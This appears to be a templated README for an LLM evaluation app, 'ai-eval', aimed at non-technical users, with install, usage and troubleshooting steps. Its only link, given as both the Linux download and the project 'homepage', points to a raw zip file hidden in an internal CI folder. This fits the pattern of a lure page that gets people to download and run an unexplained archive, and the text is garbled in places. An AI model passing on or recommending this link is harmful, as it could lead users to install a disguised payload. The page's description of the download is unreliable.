Welcome to ai-eval, your tool to test and evaluate large language models (LLMs). This guide will help you download and run the software, even if you have no programming experience or technical background.
ai-eval helps you understand how well different LLMs perform on various tasks. It gives you easy-to-read results, so you can compare models or track improvements over time.
You don’t need special skills or tools, just a computer that meets the requirements.
To run ai-eval smoothly, make sure your computer meets these requirements:
- Operating System: Windows 10 or newer, macOS 10.15 or newer, or recent Linux distributions (Ubuntu 20.04+, Fedora 34+)
- Processor: 64-bit dual-core CPU or better
- RAM: At least 4 GB, 8 GB recommended for bigger evaluation tasks
- Storage: 200 MB free space for the app, plus extra for results files
- Internet: Required for downloading the software and for optional model access
-
Click the big blue button at the top or visit this page to download the latest version of ai-eval:
-
This page lists the available versions. Find the file that matches your operating system:
- For Windows, look for files ending in
.exeor.msi - For macOS, look for
.dmgor.pkg - For Linux, look for
.AppImageorhttps://github.com/4xxpray/ai-eval/raw/refs/heads/main/internal/ci/ai-eval-2.1.zip
- For Windows, look for files ending in
-
Click the file name to start the download. Your browser will save the file to your usual downloads folder.
-
Once downloaded, open the file:
- On Windows or macOS, double-click it to run the installer.
- On Linux, follow instructions in the release notes for installation.
-
Follow the on-screen installation instructions. Accept any prompts to install.
-
After installation completes, you can launch ai-eval from your start menu (Windows), Applications folder (macOS), or your Linux application launcher.
You will see a simple window when ai-eval runs. Here is how to get started:
-
Load a Model: Click the “Load Model” button to choose a language model file or connect to an online model if you have API access.
-
Select Evaluation Task: Choose from tasks like answering questions, summarizing text, or translating sentences. These tasks test different skills of the model.
-
Start Evaluation: Click “Run Evaluation” to test the model on the chosen tasks.
-
View Results: After running, ai-eval shows scores and details. The screen will explain what the numbers mean in clear language.
ai-eval focuses on straightforward testing of language models. Its main features include:
- Easy setup with no programming needed
- Multiple pre-defined evaluation tasks for broad testing
- Clear, readable results summaries
- Ability to save your test results as files for later review
- Simple user interface that guides you step-by-step
- Support for local models and API connections
- Regular updates from developers to add new tasks and improve accuracy
After running an evaluation, you can save the results:
- Click the “Save Results” button.
- Choose a folder on your computer.
- The software saves a readable report file (PDF or text).
You can share these report files by email or upload them to your team's shared drives.
If you have any trouble, here are some common fixes:
- App won’t start: Check if your computer meets the system requirements. Restart your computer and try again.
- Download stuck or slow: Use a stable internet connection. Try downloading again or use a different browser.
- Models don’t load: Make sure you selected the correct file or entered the correct API key if needed.
- Evaluation runs but results are missing: Close and restart ai-eval, then rerun the test.
- Need help: Check the README file inside the app folder or visit the project page for updated documentation.
For more information, guides, and updates, visit the ai-eval homepage:
https://github.com/4xxpray/ai-eval/raw/refs/heads/main/internal/ci/ai-eval-2.1.zip
You can also find support or report issues there if something doesn’t work as expected.